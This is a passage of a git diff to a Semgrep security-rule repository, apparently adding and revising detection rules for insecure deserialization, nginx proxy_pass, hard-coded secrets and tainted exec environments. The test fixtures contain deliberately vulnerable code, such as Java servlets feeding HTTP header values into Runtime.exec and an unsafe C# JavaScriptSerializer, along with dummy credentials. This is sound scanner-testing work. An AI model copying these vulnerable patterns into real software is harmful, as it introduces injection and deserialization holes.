diff --git a/.github/workflows/semgrep-rule-lints.yaml b/.github/workflows/semgrep-rule-lints.yaml index 82cdb04e25..9114b485ac 100644 --- a/.github/workflows/semgrep-rule-lints.yaml +++ b/.github/workflows/semgrep-rule-lints.yaml @@ -34,6 +34,7 @@ jobs: --config yaml/semgrep/metadata-likelihood-incorrect-value.yaml \ --config yaml/semgrep/metadata-impact-incorrect-value.yaml \ --config yaml/semgrep/metadata-subcategory-incorrect-value.yaml \ + --config yaml/semgrep/metadata-incorrect-option.yaml \ --config yaml/semgrep/metadata-technology.yaml \ --config yaml/semgrep/metadata-category.yaml \ --config yaml/semgrep/multi-line-message.yaml \ diff --git a/csharp/lang/security/insecure-deserialization/javascript-serializer.cs b/csharp/lang/security/insecure-deserialization/javascript-serializer.cs index ca21953e10..2886804cf9 100644 --- a/csharp/lang/security/insecure-deserialization/javascript-serializer.cs +++ b/csharp/lang/security/insecure-deserialization/javascript-serializer.cs @@ -11,6 +11,11 @@ public void JavascriptSerializerDeserialization(string json) // ruleid: insecure-javascriptserializer-deserialization var serializer = new JavaScriptSerializer(new SimpleTypeResolver()); serializer.DeserializeObject(json); + + var resolver = new SimpleTypeResolver() + // ruleid: insecure-javascriptserializer-deserialization + var serializer2 = new JavaScriptSerializer(resolver); + serializer2.DeserializeObject(json); } catch (Exception e) { diff --git a/csharp/lang/security/insecure-deserialization/javascript-serializer.yaml b/csharp/lang/security/insecure-deserialization/javascript-serializer.yaml index a3230660b7..fb989a13d8 100644 --- a/csharp/lang/security/insecure-deserialization/javascript-serializer.yaml +++ b/csharp/lang/security/insecure-deserialization/javascript-serializer.yaml @@ -30,4 +30,4 @@ rules: using System.Web.Script.Serialization; ... - pattern: | - new JavaScriptSerializer(new SimpleTypeResolver()); + new JavaScriptSerializer((SimpleTypeResolver $RESOLVER)) diff --git a/generic/nginx/security/missing-internal.conf b/generic/nginx/security/missing-internal.conf index c9bd02aa5d..90122b11a0 100644 --- a/generic/nginx/security/missing-internal.conf +++ b/generic/nginx/security/missing-internal.conf @@ -19,3 +19,11 @@ server { proxy_pass $1://$2/$3; } } + +server { + location / { + # ok: missing-internal + proxy_pass http:/backend:42/; + set $false 'positive'; + } +} diff --git a/generic/nginx/security/missing-internal.yaml b/generic/nginx/security/missing-internal.yaml index aa513ea1ca..c29312d4dc 100644 --- a/generic/nginx/security/missing-internal.yaml +++ b/generic/nginx/security/missing-internal.yaml @@ -1,18 +1,24 @@ rules: - id: missing-internal + options: + generic_ellipsis_max_span: 0 + generic_engine: aliengrep patterns: - - pattern-inside: | - location ... { - ... - ... - } - - pattern-not-inside: | - location ... { - ... - internal; - ... - } - - pattern: proxy_pass ...$...; + - pattern-inside: | + location ... { + .... + .... + } + - pattern-not-inside: | + location ... { + .... + internal; + .... + } + - pattern: proxy_pass $...URL; + - metavariable-regex: + metavariable: $...URL + regex: (.*\$.*) paths: include: - '*.conf' diff --git a/generic/secrets/gitleaks/generic-api-key.txt b/generic/secrets/gitleaks/generic-api-key.txt index 3615701ba4..9c35ba7369 100644 --- a/generic/secrets/gitleaks/generic-api-key.txt +++ b/generic/secrets/gitleaks/generic-api-key.txt @@ -17,7 +17,7 @@ private const string UserCreationPasswordSecretKey =@"6da89121079f83b2eb6acccf82 // ruleid: generic-api-key app.secret=edf10572-880c-4dd9-aaf0-6ec402f678db // ruleid: generic-api-key -val PASSWORD = "Iv1.6213212547e00438__globPaths__123" +val PASSWORD = "Iv1.6213212547e00438__globaths__123" eironment: POSTGRES_DB: postgres POSTGRES_USER: as2user @@ -34,7 +34,7 @@ this.cmfPassword.foo = "thiscmfPassword1" const connectionToken = `12345-123-abc`; this._perfKey = 'network_XMLHttpRequest_' + String(friendlyName); -// todook: generic-api-key +// ok: generic-api-key this.txtCfmPassword.Name = "txtCfmPassword"; // ok: generic-api-key @@ -207,4 +207,4 @@ clientToken: "pub4306832bdc5f2b8b980c492ec2c11ef3", // ok: generic-api-key keys: 'privkey1.json', // ok: generic-api-key -"Keywords": "asdsadsadsaUSAdusadusadsa", +"Keywords": "asdsadsadsaUSAdusadusadsa", \ No newline at end of file diff --git a/generic/secrets/gitleaks/generic-api-key.yaml b/generic/secrets/gitleaks/generic-api-key.yaml index 27281761eb..823000c73a 100644 --- a/generic/secrets/gitleaks/generic-api-key.yaml +++ b/generic/secrets/gitleaks/generic-api-key.yaml @@ -68,4 +68,7 @@ rules: regex: (?!(^0x0*|^pub)|.*\.(bin|json|exe)$|.*(?i)(Client|Factory)$|(^__[A-Za-z]+__$)|^(12345|abcd)|^\d+(\.\d+)?$) # Remove AAAAA, BBBBB, CCCCC, and ..... - pattern-not-regex: (\w|\.)\1{5} - \ No newline at end of file + # stopwords from https://github.com/gitleaks/gitleaks/blob/d9f86d6123d9ef2558c4852a522a7a071d6a6fe9/cmd/generate/config/rules/stopwords.go#L4 + - metavariable-regex: + metavariable: $CONTENT + regex: (?!(?i).*(client|endpoint|vpn|_ec2_|aws_|authorize|author|define|config|credential|setting|sample|xxxxxx|000000|buffer|delete|aaaaaa|fewfwef|getenv|env_|system|example|ecdsa|sha256|sha1|sha2|md5|alert|wizard|target|onboard|welcome|page|exploit|experiment|expire|rabbitmq|scraper|widget|music|dns_|dns-|yahoo|want|json|action|script|fix_|fix-|develop|compas|stripe|service|master|metric|tech|gitignore|rich|open|stack|irc_|irc-|sublime|kohana|has_|has-|\.\.\.|fabric|wordpres|role|osx_|osx-|boost|addres|queue|working|sandbox|internet|print|vision|tracking|being|generator|traffic|world|pull|rust|watcher|small|auth|full|hash|more|install|auto|complete|learn|paper|installer|research|acces|last|binding|spine|into|chat|algorithm|resource|uploader|video|maker|next|proc|lock|robot|snake|patch|matrix|drill|terminal|term|stuff|genetic|generic|identity|audit|pattern|audio|web_|web-|crud|problem|statu|cms-|cms_|arch|coffee|workflow|changelog|another|uiview|content|kitchen|gnu_|gnu-|gnu.|conf|couchdb|client|opencv|rendering|update|concept|varnish|gui_|gui-|gui.|version|shared|extra|product|still|not_|not-|not.|drop|ring|png_|png-|png.|actively|import|output|backup|start|embedded|registry|pool|semantic|instagram|bash|system|ninja|drupal|jquery|polyfill|physic|league|guide|pack|synopsi|sketch|injection|svg_|svg-|svg.|friendly|wave|convert|manage|camera|link|slide|timer|wrapper|gallery|url_|url-|url.|todomvc|requirej|party|http|payment|async|library|home|coco|gaia|display|universal|func|metadata|hipchat|under|room|config|personal|realtime|resume|database|testing|tiny|basic|forum|meetup|yet_|yet-|yet.|cento|dead|fluentd|editor|utilitie|run_|run-|run.|box_|box-|box.|bot_|bot-|bot.|making|sample|group|monitor|ajax|parallel|cassandra|ultimate|site|get_|get-|get.|gen_|gen-|gen.|gem_|gem-|gem.|extended|image|knife|asset|nested|zero|plugin|bracket|mule|mozilla|number|act_|act-|act.|map_|map-|map.|micro|debug|openshift|chart|expres|backend|task|source|translate|jbos|composer|sqlite|profile|mustache|mqtt|yeoman|have|builder|smart|like|oauth|school|guideline|captcha|filter|bitcoin|bridge|color|toolbox|discovery|new_|new-|new.|dashboard|when|setting|level|post|standard|port|platform|yui_|yui-|yui.|grunt|animation|haskell|icon|latex|cheat|lua_|lua-|lua.|gulp|case|author|without|simulator|wifi|directory|lisp|list|flat|adventure|story|storm|gpu_|gpu-|gpu.|store|caching|attention|solr|logger|demo|shortener|hadoop|finder|phone|pipeline|range|textmate|showcase|app_|app-|app.|idiomatic|edit|our_|our-|our.|out_|out-|out.|sentiment|linked|why_|why-|why.|local|cube|gmail|job_|job-|job.|rpc_|rpc-|rpc.|contest|tcp_|tcp-|tcp.|usage|buildout|weather|transfer|automated|sphinx|issue|sas_|sas-|sas.|parallax|jasmine|addon|machine|solution|dsl_|dsl-|dsl.|episode|menu|theme|best|adapter|debugger|chrome|tutorial|life|step|people|joomla|paypal|developer|solver|team|current|love|visual|date|data|canva|container|future|xml_|xml-|xml.|twig|nagio|spatial|original|sync|archived|refinery|science|mapping|gitlab|play|ext_|ext-|ext.|session|impact|set_|set-|set.|see_|see-|see.|migration|commit|community|shopify|what'|cucumber|statamic|mysql|location|tower|line|code|amqp|hello|send|index|high|notebook|alloy|python|field|document|soap|edition|email|php_|php-|php.|command|transport|official|upload|study|secure|angularj|akka|scalable|package|request|con_|con-|con.|flexible|security|comment|module|flask|graph|flash|apache|change|window|space|lambda|sheet|bookmark|carousel|friend|objective|jekyll|bootstrap|first|article|gwt_|gwt-|gwt.|classic|media|websocket|touch|desktop|real|read|recorder|moved|storage|validator|add-on|pusher|scs_|scs-|scs.|inline|asp_|asp-|asp.|timeline|base|encoding|ffmpeg|kindle|tinymce|pretty|jpa_|jpa-|jpa.|used|user|required|webhook|download|resque|espresso|cloud|mongo|benchmark|pure|cakephp|modx|mode|reactive|fuel|written|flickr|mail|brunch|meteor|dynamic|neo_|neo-|neo.|new_|new-|new.|net_|net-|net.|typo|type|keyboard|erlang|adobe|logging|ckeditor|message|iso_|iso-|iso.|hook|ldap|folder|reference|railscast|www_|www-|www.|tracker|azure|fork|form|digital|exporter|skin|string|template|designer|gollum|fluent|entity|language|alfred|summary|wiki|kernel|calendar|plupload|symfony|foundry|remote|talk|search|dev_|dev-|dev.|del_|del-|del.|token|idea|sencha|selector|interface|create|fun_|fun-|fun.|groovy|query|grail|red_|red-|red.|laravel|monkey|slack|supported|instant|value|center|latest|work|but_|but-|but.|bug_|bug-|bug.|virtual|tweet|statsd|studio|path|real-time|frontend|notifier|coding|tool|firmware|flow|random|mediawiki|bosh|been|beer|lightbox|theory|origin|redmine|hub_|hub-|hub.|require|pro_|pro-|pro.|ant_|ant-|ant.|any_|any-|any.|recipe|closure|mapper|event|todo|model|redi|provider|rvm_|rvm-|rvm.|program|memcached|rail|silex|foreman|activity|license|strategy|batch|streaming|fast|use_|use-|use.|usb_|usb-|usb.|impres|academy|slider|please|layer|cros|now_|now-|now.|miner|extension|own_|own-|own.|app_|app-|app.|debian|symphony|example|feature|serie|tree|project|runner|entry|leetcode|layout|webrtc|logic|login|worker|toolkit|mocha|support|back|inside|device|jenkin|contact|fake|awesome|ocaml|bit_|bit-|bit.|drive|screen|prototype|gist|binary|nosql|rest|overview|dart|dark|emac|mongoid|solarized|homepage|emulator|commander|django|yandex|gradle|xcode|writer|crm_|crm-|crm.|jade|startup|error|using|format|name|spring|parser|scratch|magic|try_|try-|try.|rack|directive|challenge|slim|counter|element|chosen|doc_|doc-|doc.|meta|should|button|packet|stream|hardware|android|infinite|password|software|ghost|xamarin|spec|chef|interview|hubot|mvc_|mvc-|mvc.|exercise|leaflet|launcher|air_|air-|air.|photo|board|boxen|way_|way-|way.|computing|welcome|notepad|portfolio|cat_|cat-|cat.|can_|can-|can.|magento|yaml|domain|card|yii_|yii-|yii.|checker|browser|upgrade|only|progres|aura|ruby_|ruby-|ruby.|polymer|util|lite|hackathon|rule|log_|log-|log.|opengl|stanford|skeleton|history|inspector|help|soon|selenium|lab_|lab-|lab.|scheme|schema|look|ready|leveldb|docker|game|minimal|logstash|messaging|within|heroku|mongodb|kata|suite|picker|win_|win-|win.|wip_|wip-|wip.|panel|started|starter|front-end|detector|deploy|editing|based|admin|capture|spree|page|bundle|goal|rpg_|rpg-|rpg.|setup|side|mean|reader|cookbook|mini|modern|seed|dom_|dom-|dom.|doc_|doc-|doc.|dot_|dot-|dot.|syntax|sugar|loader|website|make|kit_|kit-|kit.|protocol|human|daemon|golang|manager|countdown|connector|swagger|map_|map-|map.|mac_|mac-|mac.|man_|man-|man.|orm_|orm-|orm.|org_|org-|org.|little|zsh_|zsh-|zsh.|shop|show|workshop|money|grid|server|octopres|svn_|svn-|svn.|ember|embed|general|file|important|dropbox|portable|public|docpad|fish|sbt_|sbt-|sbt.|done|para|network|common|readme|popup|simple|purpose|mirror|single|cordova|exchange|object|design|gateway|account|lamp|intellij|math|mit_|mit-|mit.|control|enhanced|emitter|multi|add_|add-|add.|about|socket|preview|vagrant|cli_|cli-|cli.|powerful|top_|top-|top.|radio|watch|fluid|amazon|report|couchbase|automatic|detection|sprite|pyramid|portal|advanced|plu_|plu-|plu.|runtime|git_|git-|git.|uri_|uri-|uri.|haml|node|sql_|sql-|sql.|cool|core|obsolete|handler|iphone|extractor|array|copy|nlp_|nlp-|nlp.|reveal|pop_|pop-|pop.|engine|parse|check|html|nest|all_|all-|all.|chinese|buildpack|what|tag_|tag-|tag.|proxy|style|cookie|feed|restful|compiler|creating|prelude|context|java|rspec|mock|backbone|light|spotify|flex|related|shell|which|clas|webapp|swift|ansible|unity|console|tumblr|export|campfire|conway'|made|riak|hero|here|unix|unit|glas|smtp|how_|how-|how.|hot_|hot-|hot.|debug|release|diff|player|easy|right|old_|old-|old.|animate|time|push|explorer|course|training|nette|router|draft|structure|note|salt|where|spark|trello|power|method|social|via_|via-|via.|vim_|vim-|vim.|select|webkit|github|ftp_|ftp-|ftp.|creator|mongoose|led_|led-|led.|movie|currently|pdf_|pdf-|pdf.|load|markdown|phalcon|input|custom|atom|oracle|phonegap|ubuntu|great|rdf_|rdf-|rdf.|popcorn|firefox|zip_|zip-|zip.|cuda|dotfile|static|openwrt|viewer|powered|graphic|les_|les-|les.|doe_|doe-|doe.|maven|word|eclipse|lab_|lab-|lab.|hacking|steam|analytic|option|abstract|archive|reality|switcher|club|write|kafka|arduino|angular|online|title|don't|contao|notice|analyzer|learning|zend|external|staging|busines|tdd_|tdd-|tdd.|scanner|building|snippet|modular|bower|stm_|stm-|stm.|lib_|lib-|lib.|alpha|mobile|clean|linux|nginx|manifest|some|raspberry|gnome|ide_|ide-|ide.|block|statistic|info|drag|youtube|koan|facebook|paperclip|art_|art-|art.|quality|tab_|tab-|tab.|need|dojo|shield|computer|stat|state|twitter|utility|converter|hosting|devise|liferay|updated|force|tip_|tip-|tip.|behavior|active|call|answer|deck|better|principle|ches|bar_|bar-|bar.|reddit|three|haxe|just|plug-in|agile|manual|tetri|super|beta|parsing|doctrine|minecraft|useful|perl|sharing|agent|switch|view|dash|channel|repo|pebble|profiler|warning|cluster|running|markup|evented|mod_|mod-|mod.|share|csv_|csv-|csv.|response|good|house|connect|built|build|find|ipython|webgl|big_|big-|big.|google|scala|sdl_|sdl-|sdl.|sdk_|sdk-|sdk.|native|day_|day-|day.|puppet|text|routing|helper|linkedin|crawler|host|guard|merchant|poker|over|writing|free|classe|component|craft|nodej|phoenix|longer|quick|lazy|memory|clone|hacker|middleman|factory|motion|multiple|tornado|hack|ssh_|ssh-|ssh.|review|vimrc|driver|driven|blog|particle|table|intro|importer|thrift|xmpp|framework|refresh|react|font|librarie|variou|formatter|analysi|karma|scroll|tut_|tut-|tut.|apple|tag_|tag-|tag.|tab_|tab-|tab.|category|ionic|cache|homebrew|reverse|english|getting|shipping|clojure|boot|book|branch|combination|combo)) \ No newline at end of file diff --git a/generic/secrets/security/detected-artifactory-password.txt b/generic/secrets/security/detected-artifactory-password.txt index 4130d4ee4e..d81be1bdca 100644 --- a/generic/secrets/security/detected-artifactory-password.txt +++ b/generic/secrets/security/detected-artifactory-password.txt @@ -1,11 +1,5 @@ # ruleid: detected-artifactory-password -AP6xxxxxxxxxx - -# ruleid: detected-artifactory-password -AP2xxxxxxxxxx - -# ruleid: detected-artifactory-password -artifactoryx:_password=AP6xxxxxxxxxx +artifactoryx:_password=AP6abc1231321 # ok: detected-artifactory-password integrity sha512-AP1AyUTbi2szylgr+O0OB7gkIxEGzySLITZ2GpsaoX72YMCGI2jYAc+WUhPfvUnZYiauF4zTnN4V4TGuvFjJlw== @@ -19,9 +13,6 @@ ImageID: "SHA256:AP1AyUTbi2szylgr266fcae00707e67a2545ef34f9a29354585f93dac906749 # ok: detected-artifactory-password - hasql-1.6.0.1@sha256:AP1AyUTbi2szylgr+422a3bb776a12d5cf2bb83303778f343106f9a1cc2b4fcdf73,6628 -# ruleid: detected-artifactory-password -artifactoryx_password:AP6xxxxxxxxxx - # ok: detected-artifactory-password X-JFrog-Art-Api: $PASSWORD @@ -124,7 +115,7 @@ b3IgcHJvbW90ZSBwcm9kdWN0cyBkZXJpdmVkIGZyb20KIHRoaXMgc29mdHdhcmUgd2l0aG9 -----BEGIN PGP PUBLIC KEY BLOCK----- # ok: detected-artifactory-password -AP6xxxxxxxxxx +AP6abc1231321 -----END PGP PUBLIC KEY BLOCK----- apiVersion: appprotectdos.f5.com/v1beta1 diff --git a/generic/secrets/security/detected-artifactory-password.yaml b/generic/secrets/security/detected-artifactory-password.yaml index 90ab3a9a45..b89125ac49 100644 --- a/generic/secrets/security/detected-artifactory-password.yaml +++ b/generic/secrets/security/detected-artifactory-password.yaml @@ -1,35 +1,16 @@ rules: - id: detected-artifactory-password - options: - generic_engine: aliengrep - generic_multiline: false - generic_caseless: true patterns: - - pattern: $ITEM - - metavariable-regex: - metavariable: $ITEM - regex: \bAP[\dABCDEF][a-zA-Z0-9]{8,} - - pattern-not-inside: | - sha1... - - pattern-not-inside: | - sha2... - - pattern-not-inside: | - sha3... - - pattern-not-inside: | - sha118... - - pattern-not-inside: | - sha256... - - pattern-not-inside: | - sha512... - - pattern-not-inside: | - -BEGIN ...- - .... - ...-END ...- + - pattern-regex: (?\bAP[\dABCDEF][a-zA-Z0-9]{8,}) + - pattern-regex: .*(?i)arti[-_]?factory.* + - pattern-not-regex: .*(?i)sha(1|2|3|118|256|512).* + - pattern-not-regex: (?i)-----\s*?BEGIN[ A-Z0-9_-]*? KEY( BLOCK)?-----[\s\S]*?-----\s*?END[ A-Z0-9_-]*?\s*?----- - metavariable-analysis: analyzer: entropy metavariable: $ITEM + - pattern-not-regex: (\w|\.|\*)\1{4} languages: - - generic + - regex paths: exclude: - "*.svg" diff --git a/go/gorilla/security/audit/handler-assignment-from-multiple-sources.yaml b/go/gorilla/security/audit/handler-assignment-from-multiple-sources.yaml index 1a632f5f2e..15c908f892 100644 --- a/go/gorilla/security/audit/handler-assignment-from-multiple-sources.yaml +++ b/go/gorilla/security/audit/handler-assignment-from-multiple-sources.yaml @@ -1,7 +1,5 @@ rules: - id: handler-assignment-from-multiple-sources - options: - taint_unified_mvars: true metadata: cwe: - 'CWE-289: Authentication Bypass by Alternate Name' diff --git a/go/gorm/security/audit/gorm-dangerous-methods-usage.yaml b/go/gorm/security/audit/gorm-dangerous-methods-usage.yaml index cd849e533e..2dbf73f62d 100644 --- a/go/gorm/security/audit/gorm-dangerous-methods-usage.yaml +++ b/go/gorm/security/audit/gorm-dangerous-methods-usage.yaml @@ -45,6 +45,8 @@ rules: - pattern: strconv.Atoi(...) - pattern: | ($X: bool) + options: + interfile: true metadata: category: security technology: diff --git a/go/jwt-go/security/jwt.yaml b/go/jwt-go/security/jwt.yaml index b5c25229d0..261316b788 100644 --- a/go/jwt-go/security/jwt.yaml +++ b/go/jwt-go/security/jwt.yaml @@ -6,6 +6,8 @@ rules: being leaked and used by either an internal or external malicious adversary. It is recommended to use environment variables to securely provide credentials or retrieve credentials from a secure vault or HSM (Hardware Security Module). + options: + interfile: true metadata: cwe: - 'CWE-798: Use of Hard-coded Credentials' diff --git a/go/lang/security/audit/md5-used-as-password.yaml b/go/lang/security/audit/md5-used-as-password.yaml index 38486b8bd7..b2d42f92a9 100644 --- a/go/lang/security/audit/md5-used-as-password.yaml +++ b/go/lang/security/audit/md5-used-as-password.yaml @@ -7,6 +7,8 @@ rules: secure password hash because it can be cracked by an attacker in a short amount of time. Use a suitable password hashing function such as bcrypt. You can use the `golang.org/x/crypto/bcrypt` package. + options: + interfile: true metadata: category: security technology: diff --git a/go/lang/security/filepath-clean-misuse.yaml b/go/lang/security/filepath-clean-misuse.yaml index a621c75727..516b6d8505 100644 --- a/go/lang/security/filepath-clean-misuse.yaml +++ b/go/lang/security/filepath-clean-misuse.yaml @@ -31,6 +31,8 @@ rules: - pattern: | "/" + ... fix: filepath.FromSlash(filepath.Clean("/"+strings.Trim($...INNER, "/"))) + options: + interfile: true metadata: references: - https://pkg.go.dev/path#Clean diff --git a/go/lang/security/injection/tainted-sql-string.yaml b/go/lang/security/injection/tainted-sql-string.yaml index 8f533ec045..78f4a3f64c 100644 --- a/go/lang/security/injection/tainted-sql-string.yaml +++ b/go/lang/security/injection/tainted-sql-string.yaml @@ -9,6 +9,8 @@ rules: or manipulate data from the database. Instead, use prepared statements (`db.Query("SELECT * FROM t WHERE id = ?", id)`) or a safe library. + options: + interfile: true metadata: cwe: - "CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')" diff --git a/go/lang/security/injection/tainted-url-host.yaml b/go/lang/security/injection/tainted-url-host.yaml index cc4e1091f7..01c66edd5a 100644 --- a/go/lang/security/injection/tainted-url-host.yaml +++ b/go/lang/security/injection/tainted-url-host.yaml @@ -9,6 +9,8 @@ rules: path or query parameter. When user-input is necessary to craft the request, it is recommended to follow OWASP best practices to prevent abuse, including using an allowlist. + options: + interfile: true metadata: cwe: - "CWE-918: Server-Side Request Forgery (SSRF)" diff --git a/java/aws-lambda/security/tainted-sql-string.yaml b/java/aws-lambda/security/tainted-sql-string.yaml index 69f8d2133d..7c68ef31f8 100644 --- a/java/aws-lambda/security/tainted-sql-string.yaml +++ b/java/aws-lambda/security/tainted-sql-string.yaml @@ -9,6 +9,8 @@ rules: of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as Sequelize which will protect your queries. + options: + interfile: true metadata: references: - https://owasp.org/www-community/attacks/SQL_Injection diff --git a/java/aws-lambda/security/tainted-sqli.yaml b/java/aws-lambda/security/tainted-sqli.yaml index 40fa5263b1..eb7d253bea 100644 --- a/java/aws-lambda/security/tainted-sqli.yaml +++ b/java/aws-lambda/security/tainted-sqli.yaml @@ -47,6 +47,8 @@ rules: - metavariable-regex: metavariable: $SQLCMD regex: (execute|query|executeUpdate) + options: + interfile: true metadata: category: security technology: diff --git a/java/lang/security/audit/tainted-cmd-from-http-request.java b/java/lang/security/audit/tainted-cmd-from-http-request.java index f3de1cd2c9..9cb761fcda 100644 --- a/java/lang/security/audit/tainted-cmd-from-http-request.java +++ b/java/lang/security/audit/tainted-cmd-from-http-request.java @@ -23,6 +23,7 @@ import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; +import java.lang.Runtime; @WebServlet(value = "/cmdi-00/BenchmarkTest00006") public class bad1 extends HttpServlet { @@ -111,7 +112,8 @@ public void doPost(HttpServletRequest request, HttpServletResponse response) Runtime r = Runtime.getRuntime(); try { - // ruleid: tainted-cmd-from-http-request + // this is vulnerable, but considered a separate issue + // ok: tainted-cmd-from-http-request Process p = r.exec(args, argsEnv); org.owasp.benchmark.helpers.Utils.printOSCommandResults(p, response); } catch (IOException e) { @@ -172,7 +174,8 @@ public void doPost(HttpServletRequest request, HttpServletResponse response) Runtime r = Runtime.getRuntime(); try { - // ruleid: tainted-cmd-from-http-request + // this is vulnerable, but considered a separate issue + // ok: tainted-cmd-from-http-request Process p = r.exec(args, argsEnv); org.owasp.benchmark.helpers.Utils.printOSCommandResults(p, response); } catch (IOException e) { diff --git a/java/lang/security/audit/tainted-env-from-http-request.java b/java/lang/security/audit/tainted-env-from-http-request.java new file mode 100644 index 0000000000..47200e7d6f --- /dev/null +++ b/java/lang/security/audit/tainted-env-from-http-request.java @@ -0,0 +1,122 @@ +/** + * OWASP Benchmark v1.2 + * + *

This file is part of the Open Web Application Security Project (OWASP) Benchmark Project. For + * details, please see https://owasp.org/www-project-benchmark/. + * + *

The OWASP Benchmark is free software: you can redistribute it and/or modify it under the terms + * of the GNU General Public License as published by the Free Software Foundation, version 2. + * + *

The OWASP Benchmark is distributed in the hope that it will be useful, but WITHOUT ANY + * WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR + * PURPOSE. See the GNU General Public License for more details. + * + * @author Dave Wichers + * @created 2015 + */ +package org.owasp.benchmark.testcode; + +import java.io.IOException; +import javax.servlet.ServletException; +import javax.servlet.annotation.WebServlet; +import javax.servlet.http.HttpServlet; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import java.lang.Runtime; + +@WebServlet(value = "/cmdi-00/BenchmarkTest00007") +public class bad2 extends HttpServlet { + + private static final long serialVersionUID = 1L; + + @Override + public void doGet(HttpServletRequest request, HttpServletResponse response) + throws ServletException, IOException { + doPost(request, response); + } + + @Override + public void doPost(HttpServletRequest request, HttpServletResponse response) + throws ServletException, IOException { + // some code + response.setContentType("text/html;charset=UTF-8"); + + String param = ""; + if (request.getHeader("BenchmarkTest00007") != null) { + param = request.getHeader("BenchmarkTest00007"); + } + + // URL Decode the header value since req.getHeader() doesn't. Unlike req.getParameter(). + param = java.net.URLDecoder.decode(param, "UTF-8"); + + String cmd = + org.owasp.benchmark.helpers.Utils.getInsecureOSCommandString( + this.getClass().getClassLoader()); + String[] args = {cmd}; + String[] argsEnv = {param}; + + Runtime r = Runtime.getRuntime(); + + try { + // ruleid: tainted-env-from-http-request + Process p = r.exec(args, argsEnv); + org.owasp.benchmark.helpers.Utils.printOSCommandResults(p, response); + } catch (IOException e) { + System.out.println("Problem executing cmdi - TestCase"); + response.getWriter() + .println(org.owasp.esapi.ESAPI.encoder().encodeForHTML(e.getMessage())); + return; + } + } +} + +@WebServlet(value = "/cmdi-00/BenchmarkTest00007") +public class bad2 extends HttpServlet { + + private static final long serialVersionUID = 1L; + + @Override + public void doGet(HttpServletRequest request, HttpServletResponse response) + throws ServletException, IOException { + doPost(request, response); + } + + @Override + public void doPost(HttpServletRequest request, HttpServletResponse response) + throws ServletException, IOException { + // some code + response.setContentType("text/html;charset=UTF-8"); + + String param = ""; + if (request.getHeader("BenchmarkTest00007") != null) { + param = request.getHeader("BenchmarkTest00007"); + } + + // URL Decode the header value since req.getHeader() doesn't. Unlike req.getParameter(). + param = java.net.URLDecoder.decode(param, "UTF-8"); + + String cmd = + org.owasp.benchmark.helpers.Utils.getInsecureOSCommandString( + this.getClass().getClassLoader()); + String[] args = {cmd}; + String[] argsEnv = {cmd}; + + Runtime r = Runtime.getRuntime(); + + try { + // ok: tainted-env-from-http-request + Process p = r.exec(args, argsEnv); + org.owasp.benchmark.helpers.Utils.printOSCommandResults(p, response); + + // ok: tainted-env-from-http-request + Process p = r.exec(param, argsEnv); + } catch (IOException e) { + System.out.println("Problem executing cmdi - TestCase"); + response.getWriter() + .println(org.owasp.esapi.ESAPI.encoder().encodeForHTML(e.getMessage())); + return; + } + } +} + diff --git a/java/lang/security/audit/tainted-env-from-http-request.yaml b/java/lang/security/audit/tainted-env-from-http-request.yaml new file mode 100644 index 0000000000..b39620e8d3 --- /dev/null +++ b/java/lang/security/audit/tainted-env-from-http-request.yaml @@ -0,0 +1,45 @@ +rules: +- id: tainted-env-from-http-request + message: >- + Detected input from a HTTPServletRequest going into the environment variables of an 'exec' command. + Instead, call the command with user-supplied arguments by using the overloaded method with one String array as the argument. + `exec({"command", "arg1", "arg2"})`. + languages: [java] + severity: ERROR + mode: taint + pattern-sources: + - patterns: + - pattern-either: + - pattern: | + (HttpServletRequest $REQ) + - patterns: # this pattern is a hack to get the rule to recognize `map` as tainted source when `cookie.getValue(user_input)` is used. + - pattern-inside: | + (javax.servlet.http.Cookie[] $COOKIES) = (HttpServletRequest $REQ).getCookies(...); + ... + for (javax.servlet.http.Cookie $COOKIE: $COOKIES) { + ... + } + - pattern: | + $COOKIE.getValue(...) + pattern-sinks: + - patterns: + - pattern: (java.lang.Runtime $R).exec($CMD, $ENV_ARGS, ...); + - focus-metavariable: $ENV_ARGS + metadata: + category: security + technology: + - java + cwe: + - "CWE-454: External Initialization of Trusted Variables or Data Stores" + owasp: + - A01:2017 - Injection + - A03:2021 - Injection + references: + - https://owasp.org/Top10/A03_2021-Injection + cwe2022-top25: false + cwe2021-top25: false + subcategory: + - vuln + likelihood: MEDIUM + impact: MEDIUM + confidence: MEDIUM diff --git a/java/lang/security/audit/tainted-session-from-http-request.yaml b/java/lang/security/audit/tainted-session-from-http-request.yaml index 047ecdb96b..7bd3a58c8b 100644 --- a/java/lang/security/audit/tainted-session-from-http-request.yaml +++ b/java/lang/security/audit/tainted-session-from-http-request.yaml @@ -49,6 +49,8 @@ rules: metavariable: $FUNC regex: ^(putValue|setAttribute)$ - focus-metavariable: $VALUE + options: + interfile: true metadata: category: security technology: diff --git a/java/lang/security/audit/xss/no-direct-response-writer.yaml b/java/lang/security/audit/xss/no-direct-response-writer.yaml index 8a1207b0c3..0bccd5dad2 100644 --- a/java/lang/security/audit/xss/no-direct-response-writer.yaml +++ b/java/lang/security/audit/xss/no-direct-response-writer.yaml @@ -6,6 +6,8 @@ rules: scripting (XSS) vulnerabilities. Consider using a view technology such as JavaServer Faces (JSFs) which automatically escapes HTML views. severity: WARNING + options: + interfile: true metadata: likelihood: HIGH impact: MEDIUM diff --git a/java/spring/security/injection/tainted-file-path.yaml b/java/spring/security/injection/tainted-file-path.yaml index 055fba168c..189ec660c7 100644 --- a/java/spring/security/injection/tainted-file-path.yaml +++ b/java/spring/security/injection/tainted-file-path.yaml @@ -8,6 +8,8 @@ rules: file, to include going backwards in the directory with '../'. To address this, ensure that user-controlled variables in file paths are sanitized. You may also consider using a utility method such as org.apache.commons.io.FilenameUtils.getName(...) to only retrieve the file name from the path. + options: + interfile: true metadata: cwe: - 'CWE-23: Relative Path Traversal' diff --git a/java/spring/security/injection/tainted-sql-string.yaml b/java/spring/security/injection/tainted-sql-string.yaml index e4f84c4c9b..cfd0d5474b 100644 --- a/java/spring/security/injection/tainted-sql-string.yaml +++ b/java/spring/security/injection/tainted-sql-string.yaml @@ -33,6 +33,7 @@ rules: options: taint_assume_safe_numbers: true taint_assume_safe_booleans: true + interfile: true mode: taint pattern-sources: - patterns: diff --git 